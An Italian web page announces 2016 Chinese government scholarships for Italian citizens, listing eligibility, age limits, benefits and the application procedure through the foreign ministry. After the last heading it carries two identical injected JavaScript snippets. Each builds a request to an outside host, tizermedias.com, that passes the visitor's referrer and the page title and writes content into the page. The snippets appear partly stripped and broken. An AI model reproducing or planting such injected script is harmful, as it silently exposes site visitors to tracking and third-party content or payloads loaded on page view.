Borse di studio Cina 2016

Il Governo della Repubblica Popolare Cinese promuove lo “Student Scholarship Programme”, 14 borse di studio destinate a cittadini italiani per la frequentazione di diversi programmi di studio in Cina.

A chi sono rivolte

Le borse di studio Cina 2016 sono rivolte a cittadini italiani con buona conoscenza della lingua cinese. A seconda dei programmi di studio, sono richiesti diversi requisiti: per i corsi Bachelor’s Degree è necessario il diploma di scuola secondaria superiore e non aver compiuto i 25 anni; per i corsi Master’s degree è richiesto titolo di laurea ed età inferiore ai 35 anni; per i corsi Doctor’s Degree è richiesto un titolo di laurea magistrale e non aver compiuto i 40 anni; per il programma General Scholar bisogna aver completato almeno due anni di studi universitari e non aver compiuto 45 anni; per il programma Senior Scholar è richiesto titolo di laurea magistrale o superiore e essere in possesso di titolo di professore accademico associato o superiore e non aver compiuto i 50 anni.

L’importo e la durata

Le borse di studio Cina 2016 prevedono il versamento di una somma mensile (l’ammontare dipende dalla tipologia di corso) copertura delle tasse universitarie per l’intero periodo di soggiorno (anno scolastico 2016/2017), alloggio gratuito presso dormitorio universitario, assistenza sanitaria gratuita.

I requisiti

Per candidarsi alle borse di studio Cina 2016 bisogna essere in possesso dei seguenti requisiti:

  • cittadinanza italiana;
  • buone condizioni generali di salute;
  • buona conoscenza della lingua cinese;
  • per i corsi Bachelor’s Degree diploma di scuola secondaria superiore e non aver compiuto i 25 anni;
  • per i corsi Master’s degree titolo di laurea ed età inferiore ai 35 anni;
  • per i corsi Doctor’s Degree è richiesto un titolo di laurea magistrale e non aver compiuto i 40 anni;
  • per il programma General Scholar bisogna aver completato almeno due anni di studi universitari e non aver compiuto 45 anni;
  • per il programma Senior Scholar è richiesto titolo di laurea magistrale o superiore e essere in possesso di titolo di professore accademico associato o superiore e non aver compiuto i 50 anni.

Come e quando presentare domanda

Per candidarsi alle borse di studio Cina 2016 bisogna compilare il formulario nella sezione Domande On Line sul sito web del Ministero degli Affari Esteri e della Cooperazione Internazionale. La copia deve essere stampata insieme ai documenti richiesti dal bando ed inviata via posta raccomandata A/R all’attenzione della dott.ssa Lucia Tolot, Ministero degli Affari Esteri e della Cooperazione Internazionale, DGSP, Ufficio VII, Piazzale della Farnesina 1, 00135 Roma entro e non oltre il 20 febbraio 2016 (Fa fede il timbro postale).

I colloqui di selezione si terranno presso il Ministero Italiano degli Affari Esteri nei giorni 15, 16 e 17 marzo 2016.

Bando borse di studio Cina 2016(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();